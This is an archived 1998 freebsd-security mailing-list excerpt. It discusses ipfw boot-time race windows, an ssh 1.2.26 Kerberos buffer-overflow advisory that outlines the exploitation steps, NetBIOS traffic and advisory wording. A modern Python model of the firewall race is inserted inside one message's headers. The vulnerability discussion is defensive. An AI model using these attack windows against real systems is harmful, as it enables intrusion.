-----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134
FreeBSD: The power to serve!       | E-Mail: opsys@open-systems.net
http://www.freebsd.org             | Consulting, Network Engineering, Security
===================================| http://open-systems.net

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 05:53:07 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA13996 for freebsd-security-outgoing; Thu, 5 Nov 1998 05:53:07 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA13984 for ; Thu, 5 Nov 1998 05:52:59 -0800 (PST) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id IAA04789; Thu, 5 Nov 1998 08:52:50 -0500 (EST)
Date: Thu, 5 Nov 1998 08:52:50 -0500 (EST)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: Open Systems Networking
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Amazing wonder packet Part 2.
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 5 Nov 1998, Open Systems Networking wrote:

> "seeing how /etc/rc.firewall is a shell script, it is reasonable to assume
> that most rulesets will include small raceable sections where some packets
> that should be denied will not be. I kludged as below:
>
> put a '$fwcmd add 1 deny all from any to any' as the first rule and moved
> the flush command to one line above it.
>
> put a '$fwcmd delete 1' right after my 65534 deny all.
>
> This should cut the available time for races down substantially. I've seen
> packets hit the temporary rule but have never seen a magic packet that
> made it to the last."

Chris,

This is indeed what I had in mind, and it does substantially narrow the window of vulnerability. However, it seems to me after a quick perusal of the /etc/rc* files that it is probably still preferable to have a default deny policy than to use this kludge. There are in fact two different variations on the race attack to be considered:

1) The default policy is 'accept' and
2) The default policy is 'deny' but the rules are added out of order

The problem with 1) is that it is possible programs will be loaded in earlier portions of rc.* that might bind network ports prior to the initialization of ipfw. That is, there is a window between the ifconfig portion of rc.network in pass1 and the ipfw behavior -- and if you have ipfw as a loadable kernel module, that might actually be a large window with a debugging kernel due to the linking time. Both rc.serial and rc.pccard run prior to that point (in my rc.* as of some revision of 3.0 from the past month or so).

The default rc.* files seem to be fairly well arranged, although I have found one possible vulnerable program: rc.pccard is run prior to the ipfw rules. rc.pccard runs pccardd, which in turn will run other programs when cards are inserted/discovered. One such program is the ISC dhclient if DHCP is used to configure the machine. If ipfw requires a long link time for lkm loading, then pccardd may successfully discover the card before ipfw has been loaded into the kernel. If there is a vulnerability in dhclient (or something else run by pccardd) that your ipfw rules would normally protect you from, then *there is a dangerous window*. Picture:

rc.pccard runs
pccardd starts
rc.firewall runs
ipfw.o lkm begins to link into kernel
pccard probes card, runs dhclient
packet arrives, buffer overflow in dhclient gives root access
ipfw.o finishes loading
ipfw installs rule to protect against bad packet

Needless to say, probably the best fix here is to use the default rule of deny.

BTW, another possible nasty is as follows: suppose you have your pccard.conf set up so that it inserts some ipfw rules when a new network interface is found. If this code runs prior to or during the normal ipfw startup, then the rules may not reflect your intent, as *they may be loaded out of order*. This vulnerability applies *even if your default rule is deny*. Picture:

rc.firewall runs
ipfw.o lkm begins to link into kernel
pccard probes card, runs ipfw to allow stuff on the new interface that assumes rc.firewall has run to install existing rules
bad packet arrives doing nasty things to dhclient or some other pccardd program
ipfw.o finishes loading
ipfw installs rule to protect against bad packet

In this case, you have to assume that the ipfw rules from either pccardd or from rc.firewall *may be installed in any order* so must be idempotent :). In general, the rc.* files seem carefully arranged to forestall the execution of potentially vulnerable code prior to the ipfw rule installation. Clearly, local modifications might circumvent that -- as does the implicit code execution in pccardd that seems to have been overlooked.

The problem with 2) is that even if the policy is 'deny' by default, the ipfw command ordering may weaken the policy for a short window during the installation of the policy. The ipfw rule 1 workaround you posted handles this just fine (assuming you avoid any other rule numbered 1). One would of course need to be careful to document that people must *never* use rule 1, or they might end up with the same problem depending on how multiple rules with the same number are handled.

So here is another question for those that are more familiar with the kernel IP code. I am concerned about queueing of packets. It is my belief that (probably) as long as no daemons are yet listening on any ports at the ipfw rule installation, then any packets that slip through the rules due to bad ordering or a default policy of 'accept' will in fact be dropped because they are unneeded, and will be processed immediately: if they have made it to the point where ipfw considers them, they are high enough in the stack that they will be rejected prior to any process execution that might involve loading a program to accept them? I think we are fine, but would like some confirmation of this thought :). The attack I consider is essentially this:

rc.firewall runs
first few ipfw rules run
packet arrives, is accepted by ipfw
rest of ipfw rules go in
daemon runs
packet is grabbed by daemon for its port

This also matters for the pccard case I describe above where the rule ordering is munged by the pccardd running ipfw for an inserted interface.

Robert N Watson

Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
SafePort Network Services             http://www.safeport.com/
robert@fledge.watson.org              http://www.watson.org/~robert/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 07:37:05 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA25031 for freebsd-security-outgoing; Thu, 5 Nov 1998 07:37:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA25014 for ; Thu, 5 Nov 1998 07:36:52 -0800 (PST) (envelope-from narvi@haldjas.folklore.ee)
Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id RAA00651; Thu, 5 Nov 1998 17:35:21 +0200 (EET)
Date: Thu, 5 Nov 1998 17:35:20 +0200 (EET)
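The install-order race that Robert Watson lays out in his message above (a default-accept kernel on one hand, rules added out of numerical order under default deny on the other, and the temporary rule-1 kludge from Chris's post as a mitigation) is easiest to see by replaying the installation one command at a time. The Python model below is an added example, not code from this thread or from FreeBSD: it imitates ipfw's first-match evaluation in ascending rule-number order over a constructed three-rule policy (deny telnet, allow other TCP, deny everything else), walks through every partial table that rc.firewall would pass through, and reports each partial table that lets through a packet the finished table denies. The rule numbers, the sample packets and the scenario names are all constructed for the example.

```python
"""Replay of an ipfw rule installation to locate the race window.

Added example, not code from the thread or from FreeBSD.  ipfw checks
rules in ascending rule-number order and the first match decides; when
nothing matches, the kernel default policy applies ("allow" below stands
for ipfw's 'accept').  Because rc.firewall adds rules one at a time, the
table passes through one partial state per command; a packet that a
partial state allows but the finished table denies has found the window.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    number: int
    action: str                      # "allow" or "deny"
    proto: str                       # "ip" matches any protocol
    dst_port: Optional[int] = None   # None matches any destination port


@dataclass(frozen=True)
class Packet:
    proto: str
    dst_port: int


def matches(rule: Rule, pkt: Packet) -> bool:
    return rule.proto in ("ip", pkt.proto) and rule.dst_port in (None, pkt.dst_port)


def evaluate(table, pkt: Packet, default_policy: str) -> str:
    """First-match evaluation in rule-number order, then the kernel default."""
    for rule in sorted(table, key=lambda r: r.number):
        if matches(rule, pkt):
            return rule.action
    return default_policy


def apply_op(table: frozenset, op) -> frozenset:
    """op is ("add", Rule) or ("delete", rule_number), like the ipfw CLI."""
    kind, arg = op
    if kind == "add":
        return table | {arg}
    if kind == "delete":
        return frozenset(r for r in table if r.number != arg)
    raise ValueError(f"unknown op {kind!r}")


def race_windows(ops, packets, default_policy):
    """Return [(step, packet)] for every partial table (step 0 is the empty
    table before the first command) that allows a packet the final table
    denies.  An empty list means the installation fails closed throughout."""
    states = [frozenset()]
    for op in ops:
        states.append(apply_op(states[-1], op))
    final = states[-1]
    return [
        (step, pkt)
        for step, table in enumerate(states)
        for pkt in packets
        if evaluate(table, pkt, default_policy) == "allow"
        and evaluate(final, pkt, default_policy) == "deny"
    ]


# Constructed policy: block telnet, allow other TCP, deny everything else.
BLOCK_TELNET = Rule(100, "deny", "tcp", 23)
ALLOW_TCP = Rule(200, "allow", "tcp")
DENY_ALL = Rule(65534, "deny", "ip")
TEMP_DENY = Rule(1, "deny", "ip")      # the thread's temporary rule 1

# Constructed sample traffic: telnet (must end up denied), http (allowed), dns (denied).
PACKETS = [Packet("tcp", 23), Packet("tcp", 80), Packet("udp", 53)]


def with_rule_one(ops):
    """Chris's kludge: add rule 1 before the policy, delete it afterwards."""
    return [("add", TEMP_DENY)] + list(ops) + [("delete", 1)]


def scenarios():
    ordered = [("add", BLOCK_TELNET), ("add", ALLOW_TCP), ("add", DENY_ALL)]
    out_of_order = [("add", ALLOW_TCP), ("add", BLOCK_TELNET), ("add", DENY_ALL)]
    return {
        "default accept, rules in order": race_windows(ordered, PACKETS, "allow"),
        "default deny, rules in order": race_windows(ordered, PACKETS, "deny"),
        "default deny, rules out of order": race_windows(out_of_order, PACKETS, "deny"),
        "default accept, rule-1 kludge": race_windows(with_rule_one(ordered), PACKETS, "allow"),
        "default deny, out of order, rule-1 kludge": race_windows(with_rule_one(out_of_order), PACKETS, "deny"),
    }


if __name__ == "__main__":
    for name, leaks in scenarios().items():
        print(f"{name}: {'no window' if not leaks else leaks}")
```

Running it reproduces the thread's conclusions: with a default-accept kernel the rule-1 trick closes every gap except the one at step 0, before rule 1 itself exists, which is exactly Andrew's window between the interface coming up and rc.firewall starting; a default-deny kernel with rules installed in numerical order has no gap at all; and default deny with out-of-order rules leaks only while an allow sits in the table ahead of the deny that should precede it, which the temporary rule 1 also closes.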
From: Narvi
To: Robert Watson
cc: Open Systems Networking, freebsd-security@FreeBSD.ORG
Subject: Re: Amazing wonder packet Part 2.
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 5 Nov 1998, Robert Watson wrote:

[snip]

One thing that must be considered is that a machine *may* require a period of lax security after the network has come up. Indeed, the case may be that while the machine uses no network during the "work" phase at all (and has a deny all rule active).

> Robert N Watson
>
> Carnegie Mellon University            http://www.cmu.edu/
> TIS Labs at Network Associates, Inc.  http://www.tis.com/
> SafePort Network Services             http://www.safeport.com/
> robert@fledge.watson.org              http://www.watson.org/~robert/
>

Sander

There is no love, no good, no happiness and no future - all these are just illusions.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 07:42:18 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA25528 for freebsd-security-outgoing; Thu, 5 Nov 1998 07:42:18 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA25521 for ; Thu, 5 Nov 1998 07:42:16 -0800 (PST) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id KAA05283 for ; Thu, 5 Nov 1998 10:42:10 -0500 (EST)
Date: Thu, 5 Nov 1998 10:42:10 -0500 (EST)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: freebsd-security@FreeBSD.ORG
Subject: Re: Amazing wonder packet Part 2.
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

So in case anyone missed it in the verbosity of my previous email, I described a race condition involving rc.pccard and dhcp where network programs are executed prior to the installation of firewall rules (possibly leading to applications being exposed to the network where the ipfw rules in rc.firewall should not allow it). I also described a situation where, if your pccard script executed ipfw commands (seems reasonable for a card insert or remove), then you could get unexpected results due to interlacing of rc.firewall and pccard.conf ipfw commands.

The program execution problem appears to exist only when the default policy is 'accept'. The pccard.conf ipfw problem exists even when the default policy is 'deny', I believe.

I also raised the question: are packets ever queued after acceptance by ipfw such that they could be received later if the port is not yet bound? For example, suppose ipfw in a nascent or under-developed state accepts a packet, and then later named is started -- is it possible through any race conditions that the packet accepted earlier will make it to named later?

Robert N Watson

Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
SafePort Network Services             http://www.safeport.com/
robert@fledge.watson.org              http://www.watson.org/~robert/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 07:48:04 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA26315 for freebsd-security-outgoing; Thu, 5 Nov 1998 07:48:04 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from dt053n18.san.rr.com (dt053n18.san.rr.com [204.210.34.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA26310 for ; Thu, 5 Nov 1998 07:48:02 -0800 (PST) (envelope-from Studded@gorean.org)
Received: from gorean.org (localhost [127.0.0.1]) by dt053n18.san.rr.com (8.8.8/8.8.8) with ESMTP id HAA14298; Thu, 5 Nov 1998 07:47:25 -0800 (PST) (envelope-from Studded@gorean.org)
Message-ID: <3641C882.EA06705F@gorean.org>
Date: Thu, 05 Nov 1998 07:47:14 -0800
From: Studded
Organization: Triborough Bridge & Tunnel Authority
X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.7-STABLE-1101 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Nicholas Charles Brawn
CC: FreeBSD-security@FreeBSD.ORG
Subject: Re: [rootshell] Security Bulletin #25 (fwd)
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nicholas Charles Brawn wrote:
>
> Well I just grabbed 1.2.26 and did:
> find . -exec grep sprintf {} \; |wc -l

This is fairly tangential, but you could accomplish exactly the same thing with just grep:

grep -iRc sprintf *

hope this is useful to someone,

Doug

--
*** Chief Operations Officer, DALnet IRC network ***

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 10:22:17 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA10126 for freebsd-security-outgoing; Thu, 5 Nov 1998 10:22:17 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from infowest.com (ns1.infowest.com [204.17.177.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA10120 for ; Thu, 5 Nov 1998 10:22:15 -0800 (PST) (envelope-from agifford@infowest.com)
Received: from infowest.com (eq.net [207.49.60.250]) by infowest.com (8.8.8/8.8.8) with ESMTP id LAA20326 for ; Thu, 5 Nov 1998 11:22:04 -0700 (MST)
Message-ID: <3641ECC1.772D9737@infowest.com>
Date: Thu, 05 Nov 1998 11:21:53 -0700
From: "Aaron D. Gifford"
X-Mailer: Mozilla 4.07 [en] (X11; I; FreeBSD 2.2.7-STABLE i386)
MIME-Version: 1.0
To: security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment
References: <16481.910223203@time.cdrom.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Jordan K. Hubbard wrote:
>
> > I read the advisory. Often, problems cover other versions as
> > well as the one(s) mentioned. And, since I'm paranoid, I
>
> Security advisories are generally very careful to mention *every*
> version covered, an advisory having little value if this piece of
> information is not accurate. It also avoids a flood of unnecessary
> "is my release affected?!" messages. :-)
>
> - Jordan
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

However, if you TRULY wanted to avoid "is my release affected?" posts, an additional line in the advisory saying something like "Versions 2.2.7 and 2.2.7-STABLE as of are not affected." would be handy to see in the advisory as well, since the 2.2.7 line is still viable and popular. I can understand the problem that would be involved if one tried to mention EVERY version NOT affected (which would be ridiculous), but a single line mentioning viable release versions NOT affected would be nice.

Aaron out.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 11:59:21 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA22654 for freebsd-security-outgoing; Thu, 5 Nov 1998 11:59:21 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from commnet.accn.org (commnet.accn.org [207.73.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA22646 for ; Thu, 5 Nov 1998 11:59:19 -0800 (PST) (envelope-from ryanm@accn.org)
Received: from accn.org (nt1.accn.org [207.73.64.8]) by commnet.accn.org (8.9.1a/8.9.1) with ESMTP id OAA11388 for ; Thu, 5 Nov 1998 14:58:52 -0500 (EST)
Message-ID: <36420344.FAEEF45E@accn.org>
Date: Thu, 05 Nov 1998 14:57:56 -0500
From: ryanm
X-Mailer: Mozilla 4.5 [en] (WinNT; I)
X-Accept-Language: en
MIME-Version: 1.0
To: "FreeBSD-security@FreeBSD.ORG"
Subject: netbios-ns requests
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello FreeBSD Gurus,

In my day to day matters I have noticed several port 137 packets getting nixed by my firewall. In looking at some tcpdump output I have noticed the following packets originating here and destined for places on the Internet, and some places on the Internet destined for my internal network. I am curious what would cause this and how this can be disabled? Is there a security issue out there related to this type of traffic? I have attached my tcpdump output below. If anyone can pass on any info related to these issues to me I would be appreciative. If possible email me back directly.

Thanks very much for your info/help

Ryan

TCPDUMP OUTPUT FOR 3 PACKETS:

15:50:08.319069 X.X.X.X.netbios-ns > X.X.X.X.netbios-ns: udp 50 (ttl 32, id 9475)
15:50:10.059069 X.X.X.X.netbios-ns > X.X.X.X.netbios-ns: udp 50 (ttl 32, id 10499)
15:50:11.569069 X.X.X.X.netbios-ns > X.X.X.X.netbios-ns: udp 50 (ttl 32, id 10755)

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 12:43:30 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA28255 for freebsd-security-outgoing; Thu, 5 Nov 1998 12:43:30 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from socrates.i-pi.com (socrates.i-pi.com [198.49.217.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA28246 for ; Thu, 5 Nov 1998 12:43:23 -0800 (PST) (envelope-from ingham@i-pi.com)
Received: (from ingham@localhost) by socrates.i-pi.com (8.8.8/8.8.7) id NAA03908; Thu, 5 Nov 1998 13:42:42 -0700 (MST) (envelope-from ingham)
Message-ID: <19981105134241.A3887@i-pi.com>
Date: Thu, 5 Nov 1998 13:42:41 -0700
From: Kenneth Ingham
To: ryanm, "FreeBSD-security@FreeBSD.ORG"
Subject: Re: netbios-ns requests
References: <36420344.FAEEF45E@accn.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.1i
In-Reply-To: <36420344.FAEEF45E@accn.org>; from ryanm on Thu, Nov 05, 1998 at 02:57:56PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Nov 05, 1998 at 02:57:56PM -0500, ryanm wrote:
> Hello FreeBSD Gurus,
>
> In my day to day matters I have noticed several port 137 packets getting
> nixed by
> my firewall.

This just got discussed. Take a look in the archives, for example
http://www.freebsd.org/cgi/getmsg.cgi?fetch=93002+95200+/usr/local/www/db/text/1998/freebsd-security/19980816.freebsd-security

It boils down to: if WINS is turned on on a PC that is going to one of your machines, it tries to do a WINS lookup.

Kenneth

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 14:34:40 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA11895 for freebsd-security-outgoing; Thu, 5 Nov 1998 14:34:40 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail1.its.rpi.edu (mail1.its.rpi.edu [128.113.100.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA11890 for ; Thu, 5 Nov 1998 14:34:37 -0800 (PST) (envelope-from drosih@rpi.edu)
Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail1.its.rpi.edu (8.8.8/8.8.6) with ESMTP id RAA100430; Thu, 5 Nov 1998 17:34:56 -0500
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Sender: drosih@pop1.rpi.edu
Message-Id:
In-Reply-To: <3641ECC1.772D9737@infowest.com>
References: <16481.910223203@time.cdrom.com>
Date: Thu, 5 Nov 1998 17:34:04 -0500
To: "Aaron D. Gifford", security@FreeBSD.ORG
From: Garance A Drosihn Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

At 11:21 AM -0700 11/5/98, Aaron D. Gifford wrote:
>Jordan K. Hubbard wrote:
>>
>> Security advisories are generally very careful to mention *every*
>> version covered, an advisory having little value if this piece of
>> information is not accurate. It also avoids a flood of unnecessary
>> "is my release affected?!" messages. :-)
>>
>> - Jordan
>
> However, if you TRULY wanted to avoid "is my release affected?"
> posts, an additional line in the advisory saying something like
> "Versions 2.2.7 and 2.2.7-STABLE as of are not affected."
> would be handy to see in the advisory as well, since the 2.2.7
> line is still viable and popular.

At which point, 2.2.6 users will immediately say "Hey! You explicitly mentioned that 2.2.7 is not affected, but you didn't say anything about 2.2.6. Does that mean I have to upgrade?"

Perhaps the notice could be a bit more clear with a generic "no other versions are affected", but I think it will be even more confusing if the notice explicitly mentions one version which is not affected, but doesn't mention other ones which are also not affected.
--- Garance Alistair Drosehn = gad@eclipse.its.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 14:54:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA14123 for freebsd-security-outgoing; Thu, 5 Nov 1998 14:54:32 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from orbital.tiora.net ([24.0.185.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA14118 for ; Thu, 5 Nov 1998 14:54:31 -0800 (PST) (envelope-from liam@orbital.tiora.net) Received: from localhost (liam@localhost) by orbital.tiora.net (8.9.1a/8.9.1a+rbl+antispam+zol_hack) with SMTP id OAA19157 for ; Thu, 5 Nov 1998 14:59:35 -0800 (PST) Date: Thu, 5 Nov 1998 14:59:35 -0800 (PST) From: Liam Slusser To: FreeBSD-security@FreeBSD.ORG Subject: ssh 1.2.26 and kerberos code.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Here is some info ya might like..

You can find the patch (and the full report from ssh) on rootshell.
http://rootshell.com/archive-j457nxiqi3gp59dv/199811/sshkerb.txt.html

liam

--------------------------------------------------------------------

This morning SSH Communications Security LTD. released information about a buffer overflow in its ssh 1.2.26 client kerberos code. This came as a surprise after SSH was very bullish about there being no buffer overflows in their code. While it is VERY hard to exploit and only works under certain conditions, it is still a valid security hole.

Here is the official statement from ssh.

[ http://www.rootshell.com/ ]

Date: Thu, 5 Nov 1998 02:38:51 +0200
From: Tatu Ylonen
Organization: SSH Communications Security, Finland
Subject: security patch for ssh-1.2.26 kerberos code

-----BEGIN PGP SIGNED MESSAGE-----

This message contains information relevant to people who compile ssh with --with-kerberos5. There are one or more potential security problems in the Kerberos code. These issues are not relevant for people who have not explicitly specified --with-kerberos5 on the configure command line.

Peter Benie found a buffer overflow in the kerberos authentication code. To quote from his mail:

> What about sshconnect.c, line 1139
>
> sprintf(server_name,"host/%s@", remotehost);
>
> where remotehost is (char *) get_canonical_hostname() (up to 255 chars),
> is copied into server_name (a 128 char buffer)?

It looks to me like this is a genuine buffer overflow. I had not noticed it when going through the code.

This buffer overflow is, however, extremely hard to exploit:

1. The victim must have the client compiled with --with-kerberos5 and --enable-kerberos-tgt-passing.
2. The victim must be connecting to a server running with the same options (i.e., krb5 with tgt passing).
3. You must do the following DNS spoofing:
   - fake reverse map for the *server*
   - fake forward map for the fake reversed name
4. You must fake your attack code to look like valid DNS records; this is highly nontrivial with modern versions of bind that reject all domain names with invalid characters in them.
5. Only the part of the DNS name beyond 128 bytes can be exploited; that must be made to align with stack frames and must contain appropriate return addresses and jump addresses. It has been shown that this can generally be done, but the space and structural constraints here are extremely tight compared to most instances of buffer overflow exploits.
6. Since the client with Kerberos TGT passing is only used interactively, the user will almost certainly notice that something went wrong.
I don't think you can, within the structure and space constraints, construct the code so that the user would not notice at least the client crashing.
7. You cannot try again after a failed attack until the client again tries to log into the same host.

This might yield an attack against the *client*.

I've fixed this in the source tree.

I'd like to thank Peter for reporting this. A fix will be included in the next release (which I expect in about a week).

System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage
www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address
Lowered turbo powered Honda Civics are really cool. <---------- my quote

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 18:38:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA05451 for freebsd-security-outgoing; Thu, 5 Nov 1998 18:38:38 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA05444 for ; Thu, 5 Nov 1998 18:38:34 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id VAA08649; Thu, 5 Nov 1998 21:38:06 -0500 (EST) Date: Thu, 5 Nov 1998 21:38:06 -0500 (EST)
From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Liam Slusser cc: FreeBSD-security@FreeBSD.ORG Subject: Re: ssh 1.2.26 and kerberos code.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I do not know if this applies to the KrbIV code shipped with FreeBSD by default; the notes below indicate it does apply to the KrbV code. I believe Dug Song (sp?) is the maintainer of the KrbIV patch for SSH, and I believe that the FreeBSD port does not install the patch. Clearly, this is of interest if you are running KrbV, however.

On Thu, 5 Nov 1998, Liam Slusser wrote:

> Here is some info ya might like..
>
> You can find the patch (and the full report from ssh) on rootshell.
> http://rootshell.com/archive-j457nxiqi3gp59dv/199811/sshkerb.txt.html
>
> liam
>
> --------------------------------------------------------------------
>
> This morning SSH Communications Security LTD. released information about a
> buffer overflow in its ssh 1.2.26 client kerberos code. This came as a
> surprise after SSH was very bullish about there being no buffer
> overflows in their code. While it is VERY hard to exploit and only works
> under certain conditions, it is still a valid security hole.
>
> Here is the official statement from ssh.
>
> [ http://www.rootshell.com/ ]
>
> [...]

Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc.
http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 19:45:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA11359 for freebsd-security-outgoing; Thu, 5 Nov 1998 19:45:00 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA11351 for ; Thu, 5 Nov 1998 19:44:58 -0800 (PST) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id TAA16584; Thu, 5 Nov 1998 19:44:47 -0800 (PST) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma016577; Thu Nov 5 19:44:38 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id TAA20295; Thu, 5 Nov 1998 19:44:38 -0800 (PST) 
